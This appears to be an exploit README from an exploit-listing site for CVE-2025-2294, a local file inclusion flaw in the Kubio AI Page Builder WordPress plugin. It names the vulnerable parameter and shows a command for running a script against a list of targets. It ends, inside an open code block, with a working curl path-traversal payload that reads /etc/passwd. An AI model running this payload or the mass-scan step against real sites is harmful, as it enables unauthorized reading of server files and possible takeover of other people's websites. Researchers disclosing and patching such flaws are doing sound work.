## https://sploitus.com/exploit?id=AA736359-13D6-55ED-A93F-614414FF50B6
# CVE-2025-2294
# ๐จ CVE-2025-2294 - Local File Inclusion (LFI) Vulnerability in Kubio AI Page Builder for WordPress ๐งฑ
## ๐ Overview
**CVE-2025-2294** is a critical ๐ฅ Local File Inclusion (LFI) vulnerability affecting the Kubio AI Page Builder plugin for WordPress (versions up to and including 2.5.1). This flaw allows **unauthenticated remote attackers** ๐พ to include arbitrary files on the server via the `__kubio-site-edit-iframe-classic-template` URL parameter.
Exploiting this vulnerability may lead to disclosure of sensitive files ๐, remote code execution ๐ฅ, and full system compromise ๐.
## ๐ค Author
**Muhammad Nizar** โ Security Researcher ๐
GitHub: [0xWhoami35](https://github.com/0xWhoami35)
YouTube: [InfoSec Insight](https://www.youtube.com/channel/UC33gQFGBqkqDE0zZNwamCgw) โถ๏ธ
---
*Feel free to reach out for questions or collaboration! ๐ค*
---
## ๐ Affected Versions
- Kubio AI Page Builder plugin โค 2.5.1 ๐ ๏ธ
---
## ๐งฐ Usage
Run the exploit script with a list of target URLs:
```bash
python3 lfi.py -l list.txt
```
## โ ๏ธ Vulnerability Details
- **Type:** Local File Inclusion (LFI) ๐ณ๏ธ
- **Severity:** Critical (CVSS 9.8) ๐ฅ
- **Attack Vector:** Remote, unauthenticated ๐
- **Impact:** Confidentiality, Integrity, Availability ๐
---
## ๐งช Proof of Concept (PoC)
```bash
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"